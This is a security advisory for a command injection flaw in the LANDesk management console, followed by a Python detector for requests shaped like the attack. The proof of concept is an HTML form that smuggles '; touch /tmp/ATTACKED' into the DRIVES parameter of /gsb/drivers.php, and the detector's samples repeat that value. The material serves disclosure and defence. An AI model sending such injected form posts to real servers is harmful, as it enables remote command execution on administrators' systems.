LANDesk is a network management system that can control desktops, servers, and mobile devices. LANDesk does not properly process HTML Tag requests, which may lead to arbitrary code execution.
[+] Info:
~~~~~~~~~
Title: LANDesk OS command injection
Advisory Id: CORE-2010-1018
Advisory URL: http://www.coresecurity.com/content/landesk-os-command-injection-vulnerability
Date published: 2010-11-10
Date of last update: 2010-11-10
Vendors contacted: LANDesk
Release mode: Coordinated release
[+] PoC:
~~~~~~~~~
This PoC is an HTML form (that can be hosted on any web site) that makes a request to
[server]. The parameter DRIVES contains the actual injection. In the example, we generate
the file /tmp/ATTACKED to show that arbitrary shell commands can be executed on the server.
<html>
<head><title>LANDesk PoC</title></head>
<body>
<form method="post" action="https://[server]/gsb/drivers.php">
<input type="text" name="DRIVES" value="; touch /tmp/ATTACKED">
<input type="text" name="SECONDTIME" value="1">
<input type="text" name="ACTION" value="getupdate">
<input type="submit" value="Attack!">
</form>
</body>
</html>
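Added example (not part of the advisory or of LANDesk's code): a defensive check, in Python, that flags logged requests shaped like the PoC above, i.e. posts to /gsb/drivers.php whose DRIVES value carries shell metacharacters, or that arrive from another site's form. The request-record layout, the CONSOLE_HOST name, the benign value "C" and the sample records are constructed assumptions.

```python
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Endpoint and parameter named in the advisory's PoC.
TARGET_PATH = "/gsb/drivers.php"
PARAM = "DRIVES"
# Characters a shell treats as separators, substitution or redirection.
SHELL_META = set(";|&`$<>\n\r")
# Assumption: the management console's own hostname (placeholder value).
CONSOLE_HOST = "landesk.example.internal"

# Constructed sample records: one same-origin post, one shaped like the PoC form.
SAMPLES = [
    {"method": "POST", "path": "/gsb/drivers.php",
     "headers": {"Origin": "https://landesk.example.internal"},
     "body": "DRIVES=C&SECONDTIME=1&ACTION=getupdate"},
    {"method": "POST", "path": "/gsb/drivers.php",
     "headers": {"Referer": "http://other.example/page.html"},
     "body": "DRIVES=%3B+touch+%2Ftmp%2FATTACKED&SECONDTIME=1&ACTION=getupdate"},
]


def inspect(req):
    """Return findings for one logged request (dict: method, path, headers, body)."""
    if urlsplit(req["path"]).path.lower() != TARGET_PATH:
        return []
    findings = []
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    for value in params.get(PARAM, []):
        # parse_qs decodes once; decode again so a double-encoded ';' (%253B) is seen.
        decoded = unquote_plus(value)
        hits = sorted(SHELL_META & set(value + decoded))
        if hits:
            findings.append(f"shell metacharacters in {PARAM}: {hits!r}")
    headers = req.get("headers", {})
    origin = headers.get("Origin") or headers.get("Referer")
    # The PoC form can be hosted on any site, so a foreign Origin/Referer is a signal.
    if req["method"] == "POST" and origin and urlsplit(origin).hostname != CONSOLE_HOST:
        findings.append(f"cross-site form post from {origin}")
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["body"], "->", inspect(sample))
```
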
[+] Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/15488
http://www.landesk.com/
http://www.nsfocus.net/vulndb/15995